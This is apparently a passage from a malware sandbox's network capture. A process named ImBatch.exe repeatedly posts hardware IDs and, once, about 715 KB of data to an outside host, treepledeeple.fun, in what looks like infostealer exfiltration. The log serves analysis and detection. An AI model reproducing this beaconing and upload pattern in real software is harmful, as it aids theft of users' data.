{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7x2s5BQVy9IEeHHtBVCiZKFwsYiWJDiythT36geVWwkF%2F0xqZmsaG%2FwPrARHRweEniLb9buDweyHfAFG1UIMMnZf2DymGwgukQeSsgcs%2Bxmhg9%2BZAMIPsDyo%2B42HSoNMhdHWsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd02ce8ab42e4-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:50.192905903 CEST	585	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.5	49757	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:50.445713043 CEST	586	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:50.448220968 CEST	586	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:50.774121046 CEST	587	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=rd6sdj74bolaffkiuvfo6n1656; expires=Tue, 09 Jan 2024 03:10:29 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:50 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hNPLG9QafNoLwLcLSGCa9Qh2LawjMIQuWWPta7TCY2cGf586BkXyDJjjNn9ejWPAnUx08HAW3V%2Ffu2H5Uqk2%2B%2Fxst%2BLCi5Py9sZbvRBLDaTSo8nCcmZdwAQkGJ3F4UAm%2BC9mzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd03079abc448-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:50.774243116 CEST	588	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49758	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:50.975744009 CEST	588	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:50.976878881 CEST	589	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:51.285547018 CEST	590	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=32pqsjlhf62feetm7005gi2eap; expires=Tue, 09 Jan 2024 03:10:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VjsUqAvBFlSjN6uZA7A1hgdem0lMhd9IGXKatlU3OJjx3pp9A0gW1brtwb5g3aSqNSLj7dg1mP0Cl%2FOlShyL%2BZO3qPgxJpcpuDAkzD8fwAkxZVVCv%2Fd3EWN3zW1zun0k4z3NbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd033c92a429e-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:51.285610914 CEST	590	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49759	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:51.507467031 CEST	591	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:51.508455038 CEST	592	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:51.802405119 CEST	593	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=me89kf5rdt12hi6qcjk3da5pj4; expires=Tue, 09 Jan 2024 03:10:30 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:51 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OjQitT0qDnTizLu8j7oe308%2F7iwkXaAi2uqTuEgDk0AzyfFIh4nR5LPwXJBMEXwBrd2gz7%2FxZCZx%2BWeohU8f0PUGprzHZ7xo7j10DtKZY65vfBadzawBVJMOG5m1Y09%2B6MPDkA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd0371af6c324-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:51.802521944 CEST	593	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.5	49760	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:52.156843901 CEST	594	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:52.157856941 CEST	594	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:52.495292902 CEST	596	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ll1s8ft3s2h6200ihge2a32525; expires=Tue, 09 Jan 2024 03:10:31 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:52 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yDQjgpULBiS04v%2FjD7fGANqmqKsTwVaF8JJ3yTTW3SSgLVr7fW3nI%2BfOf689hd%2FLnQzr5VP4Z7TnXeOPH%2B8ptoHRTiPRMwysH35cbo8BpxqrKFysMZ1yyxwu2pfVOwtBY4zy3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd03b2ec7434a-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:52.495326996 CEST	596	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.5	49761	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:52.979084969 CEST	596	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:52.980084896 CEST	597	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:53.314035892 CEST	598	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=tm06a9mt76oclnn8cppm01pmv2; expires=Tue, 09 Jan 2024 03:10:32 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:53 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yi%2BzKgVNk8nkqcfJdK7akeWNJw25rXrz1J0XV%2FbVymDWEeD2GcTO67T9xcHHFmVJJDybkYYKw%2BKW2ksXEjhabOQzQZb81QHdoZOOAlNwnLP%2B%2BsbdB9t1Tkg7M7DyUjZavc8Wvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd0405df54338-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:53.314066887 CEST	598	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.5	49762	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:55.576342106 CEST	599	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 715204 Host: treepledeeple.fun
Sep 15, 2023 11:23:55.577631950 CEST	611	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:55.667701006 CEST	612	OUT	Data Raw: 93 97 45 79 28 2b ec ed ef bd 49 1a ab 1c b2 4f 4e 2f f7 15 9d ab 50 ff 64 5b bd ef e4 ba fe 3b 74 ed 82 06 4f b5 0f 56 5f 4e f5 95 62 e2 3b 6b bd cf 95 3f d4 53 63 be 58 0e 4b bf 67 dd ef c4 c4 ff 97 59 5f e1 36 bd 24 dd a6 5d 7f 59 eb 38 1d d6 Data Ascii: Ey(+ION/Pd[;tOV_Nb;k?ScXKgY_6$]Y8[6obJ</elp(/hwaYqzdgE9Uu+YuU.aXy0ea'\|rY/']RO\|?.:xY~H7`;1
Sep 15, 2023 11:23:55.668617010 CEST	615	OUT	Data Raw: b7 b3 6e cf ba f7 23 b7 c3 34 18 5b 04 df 35 71 0c 28 7c 2e a9 0f 32 c6 f7 e5 fd 20 ff 5b d1 e9 f9 fc b2 6f 2f b3 3d 7c f7 86 cf 54 57 0c e1 84 1b c2 78 d4 7a fe eb 38 0e b5 82 16 53 c1 ed 78 8c 8f 7e c4 ca 0b 31 6f d7 58 95 d9 49 d6 fe 90 a9 70 Data Ascii: n#4[5q(\|.2 [o/=\|TWxz8Sx~1oXIpV\<r^of)\|z<tY\|b/}wm6G_eve%nOvSvyE3JRW?\|JgOzcO>U;t;F[.
Sep 15, 2023 11:23:55.668685913 CEST	617	OUT	Data Raw: 70 dc 44 f6 fb 65 d3 f1 d7 f3 4f ed cd f3 f7 d7 17 4c d5 ee ff db e7 db 15 b3 3f 9e e7 0f c7 79 ec 2b 8c 63 3e 5f fc 8f 3a 4c fc 7f 71 5c 6d 7d a6 e6 04 5c d2 8b 87 cb 3e 7f 3a 8e 57 16 87 e9 9a e6 7f cc dd 38 be af e5 a7 c8 dc 62 25 cd 77 86 db Data Ascii: pDeOL?y+c>_:Lq\m}\>:W8b%wB'CHWMXP9gPSyo=<=)894yd/K~z?>vl&+d[Isiq=a29,_>
Sep 15, 2023 11:23:55.668761969 CEST	620	OUT	Data Raw: 38 2f e4 17 cc 79 38 1f 8b 71 60 7a e6 59 ca c4 2c bf 57 e6 70 96 56 0e 0d b5 77 d6 bc 7a 96 9f ad e5 57 6b e9 fb 58 13 c8 9c d2 62 73 b8 ff 88 9f 2c b6 fd 9f 51 d7 88 fe cd e8 3f 8c c7 ae 75 b4 94 18 82 7c 4a 3c 10 8d f3 a1 6d 0b 97 b9 78 0d f2 Data Ascii: 8/y8q`zY,WpVwzWkXbs,Q?u\|J<mxl225p-l\|r'=-WG,pc_cs^9N?~Ob^,w2=97st[daF-wV@t;+"Xzu
Sep 15, 2023 11:23:55.668823004 CEST	622	OUT	Data Raw: 0f 7c cc da 7e f9 37 97 07 f3 77 b5 51 ac 47 ab 5d 31 cf e4 75 45 f4 7f 6a c2 ef 44 c3 27 7e bc 32 97 9f c4 04 11 c6 67 99 ac 93 34 92 56 b6 69 d9 5f 6b ad b5 36 97 cc ea 87 b8 de 87 e3 bb 20 eb f9 89 73 fc a1 ef 91 be 77 e3 98 1e fa e9 9a 8b 48 Data Ascii: \|~7wQG]1uEjD'~2g4Vi_k6 swHKqk9Rq~<;n\veu:Vr2ql#\|sx(3`?/k<w2$khTs~8x={<GfdpSN<6x;\|kO\@
Sep 15, 2023 11:23:55.668881893 CEST	625	OUT	Data Raw: 26 1a 2b eb f3 9f e6 e4 f7 ed 1f f5 59 ae 31 35 33 1f 1e 1f 5b 63 f0 19 f2 97 e3 b8 0c 16 b7 e1 b1 af ab 0c e6 3e 89 61 b9 78 9b f5 5d 75 7e ac 89 d3 65 ac b1 63 be c7 ba 3c 5e cf fe c5 a8 45 64 56 87 e5 66 d6 67 69 02 f9 58 2d 5d a1 2b ee 88 c5 Data Ascii: &+Y153[c>ax]u~ec<^EdVfgiX-]+;.;9amKs+=9q?>eqxlxQ5c)r!I}FEOZXE1eK`M&ed.]>%'kxsy)@3u}u
Sep 15, 2023 11:23:55.668965101 CEST	628	OUT	Data Raw: ab ac 89 26 0f d2 20 4b d5 f3 cc db e1 fe 38 0e 94 ae cf c3 e4 c7 69 2c dd 5a 6b ad b5 36 4e 66 3d 97 f8 19 91 fb 9d dc e2 9e 26 6f 86 34 79 aa 3b 40 7d 82 c6 27 c4 ef 38 0e b1 62 14 a2 f6 af 2f 96 07 ce 79 b4 78 74 35 79 bc 3f d7 d8 d2 62 8c 58 Data Ascii: & K8i,Zk6Nf=&o4y;@}'8b/yxt5y?bX,?3E?F*uJ3=<VzdV9O9`Z-l5y#b}C A&X@>}U_@9e?\NI[P@5w=Kuk
Sep 15, 2023 11:23:55.669096947 CEST	630	OUT	Data Raw: 7e c0 20 f9 9f c5 f7 90 fd f9 18 60 15 ab 52 76 e5 7f 65 fa 7d ba bc e5 7f 39 cb b7 62 54 f9 df 44 25 1b a5 f3 34 1b f9 5f 96 86 37 4b f7 3b 2e fc af 69 7e 34 0e e6 aa 0f ab 7e ea ae bf 51 e7 7f 83 ac fb d9 64 c3 e0 7f b5 de 1b 6b e2 7f c3 38 ff Data Ascii: ~ `Rve}9bTD%4_7K;.i~4~Qdk8YR%Mf\NW\|{>):@5_OSVj9{a_EZ7Nb>~otUy>('o/M}
Sep 15, 2023 11:23:55.669262886 CEST	633	OUT	Data Raw: c7 cf 4f da b7 6b b5 71 72 30 bd b6 64 7b f1 21 46 f3 f1 40 be df 58 cb 8e 5f 07 b6 7e c2 19 4f a4 96 67 40 c3 ef 83 90 ff 59 e6 e3 6a 65 f8 5b 9d 7a bf 5c 31 50 0a 94 af 2e 2e a9 f9 15 e1 0f a6 15 ec 6f 15 ed 27 ba fa 8d 65 fb 9b 2e 7e 54 d6 86 Data Ascii: Okqr0d{!F@X_~Og@Yje[z\1P..o'e.~T=.5\|i_kw&hyq)Q`yf?l_vbyZz:3@E7As?k>gm=.5\|
Sep 15, 2023 11:23:57.023040056 CEST	1389	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=rgaed8jqg0rsmr9nhrna1e6l0m; expires=Tue, 09 Jan 2024 03:10:35 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:56 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yLrKDhSqlYk0bm90g00uffXC8TZYI%2FrosP86Rts594iC2%2FcbLJqyinzJ6ufAl%2BRvF0W6nj5YeOZv%2BCEHARq%2FEVd8mDg74fCcL1xMqdTTmsdYXVSPboVOKHgvDz9%2Bp6qI3JllDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fd0508d1d41e3-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:57.023056984 CEST	1389	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49724	172.67.139.34	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:21.457422972 CEST	357	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:21.458045006 CEST	358	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:21.859769106 CEST	359	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=9tobgso3rl49ubk7rh966ep8db; expires=Tue, 09 Jan 2024 03:10:00 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:21 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dztW4y034hhwu5pXdgRYedA1cxzMywrtn32s%2Fbna7k2gOcFqxekLJXGoS9qzxeji%2B4A6N2pRTJHM33R5flavLMHl8ZiH2B6TjG3cFhm5Zo%2FLYXb7qiu5gYv%2Fnz8RBqTJStMGlw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf7b4aa2424c-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:21.859827042 CEST	359	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49725	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:22.097825050 CEST	360	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
Sep 15, 2023 11:23:22.098433018 CEST	361	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4A308B5E56AEA375C82CA4A5B40266008ABA8ADF--SqDe87817huf871793q74Content-Disposition
Sep 15, 2023 11:23:22.477068901 CEST	362	IN	HTTP/1.1 200 OK Date: Fri, 15 Sep 2023 09:23:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ffavg1hnih30s9iq2hmqaa28dq; expires=Tue, 09 Jan 2024 03:10:01 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 14 Nov 2023 09:23:22 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j54H1OnE%2BusSS14N20gNlaw0yKaVNhBLJiMOeUiOIkb3RokQyb67zMlTtmLyL8ytUY3junrL5mR1MF7%2F5IM09laH3KqwVpA5L%2BR1Qy9dRyTVYKQAf5J1PiROUzWave55J%2BCwxw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 806fcf7f4c661967-EWR Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 15, 2023 11:23:22.477157116 CEST	362	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49726	104.21.87.11	80	C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Timestamp	kBytes transferred	Direction	Data
Sep 15, 2023 11:23:22.689703941 CEST	363	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 527 Host: treepledeeple.fun
